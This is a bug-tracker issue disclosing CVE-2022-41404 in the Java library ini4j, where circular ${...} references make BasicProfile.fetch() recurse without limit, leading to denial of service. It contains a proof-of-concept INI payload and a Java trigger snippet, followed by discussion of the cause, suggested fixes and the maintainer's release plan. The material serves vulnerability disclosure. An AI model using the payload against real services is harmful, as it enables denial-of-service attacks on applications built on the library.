
#56 The package org.ini4j before 0.5.4 is vulnerable when getting a value via the fetch() method in the BasicProfile class, which may lead to DoS attacks.

v1.0 (example)
open
bug (1)
9
2026-01-27
2022-09-20
bingdian
No

Test logic usable to reproduce the behaviour
payload:
----payload.ini

[dopey]
weight = ${bashful/weight}
height = ${doc/height}

[bashful]
weight = ${dopey/weight}
height = ${dopey/height}

[doc]
weight = 49.5
height = 87.7

----java poc

        Ini ini = new Ini();
        ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini")));
        // fetch() resolves ${...} references; dopey/weight and bashful/weight reference each other
        ini.get("dopey").fetch("weight");
1 Attachments

Discussion

  • Salvatore Bonaccorso

    @szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?

     
  • Marc Lafon

    Marc Lafon - 2022-11-02

    I have taken a quick look at the source code; the problem seems to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... the recursive loop is still present in version 0.54, without any limitation.

     
  • Craig

    Craig - 2023-10-03

    This issue was assigned CVE-2022-41404. (nvd.nist.gov).

    It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?

     
  • Akisa

    Akisa - 2025-04-11

    Thank you for providing these amazing things.

     
  • Robert Nile

    Robert Nile - 2025-06-29

    You’ve got a circular reference error:

    [dopey]
    weight = ${bashful/weight}
    [bashful]
    weight = ${dopey/weight}

    Those two point to each other, causing infinite recursion.

    ✅ Fix:
    Break the cycle by referencing a concrete value, e.g.:

    [dopey]
    weight = ${doc/weight}

    [bashful]
    weight = ${doc/weight}

    Or detect and reject circular refs in code.

     

    Last edit: Robert Nile 2025-06-29
  • kliys ideom

    kliys ideom - 2025-10-07

    Good catch — the recursive loop explanation and payload example make this vulnerability very clear. A proper recursion limit or cycle detection is essential to prevent DoS.

     
  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27
    • discussion: enabled --> disabled
     
  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27

    Hello,

    A fix for this specific vulnerability (CVE-2022-41404) has been prioritized and is scheduled for the upcoming v0.6.0 release.

    The project is currently migrating to GitHub to modernize the build pipeline and deliver this security patch effectively. Please be patient while the infrastructure is finalized to support the new release.

    You can track the migration progress and release status here:
    https://github.com/ini4j/ini4j/issues/1

    The fix will be published to Maven Central as soon as v0.6.0 is ready.

    Best regards,
    ini4j Project

     
  • Ivan SZKIBA

    Ivan SZKIBA - 2026-01-27
    • discussion: disabled --> enabled
     
